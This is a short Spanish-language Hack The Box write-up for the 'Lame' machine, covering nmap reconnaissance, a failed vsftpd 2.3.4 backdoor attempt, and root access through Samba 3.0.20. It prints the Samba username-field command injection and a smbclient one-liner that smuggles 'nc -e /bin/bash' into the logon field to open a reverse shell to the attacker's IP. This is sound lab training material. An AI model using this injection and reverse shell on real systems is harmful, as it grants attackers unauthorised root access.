HTB-Lame
IP -> 10.10.10.3
Reconocimiento
Nmap
Utilizamos nmap y obtenemos los siguientes resultados. Lame Nmap Result
ftp
Vemos que el script ftp-anon de nmap nos reporta que está operativo el inicio de sesión anonimo. Pero al conectarnos no encontramos nada. Buscamos la versión del ftp (vsftpd 2.3.4) que está corriendo y encontramos que tiene un backdoor. Pero al probar a explotarlo, vemos que no es vulnerable, lo habrán parcheado.
Samba
Buscamos la version y servicio (Samba 3.0.20) en searchsploit y vemos que el campo de usuario es vulnerable.
smb: \> logon "/=`nohup <cmd>`"
Aunque al intentar conectarnos con smbclient nos da “NEGOTIATION FAILED”. Para conectarnos y que funcion tenemos que utilizar:
smbclient -L 10.10.10.3 -N --option="client min protocol=NT1"
Explotación
Samba
smbclient //10.10.10.3/tmp -N --option="client min protocol=NT1" -c 'logon "/=`nohup nc -e /bin/bash 10.10.14.10 443`"'
Entramos como root directamente.
user.txt
root.txt
Escrito el 13-12-2021 a las 09:09 pm por creep33.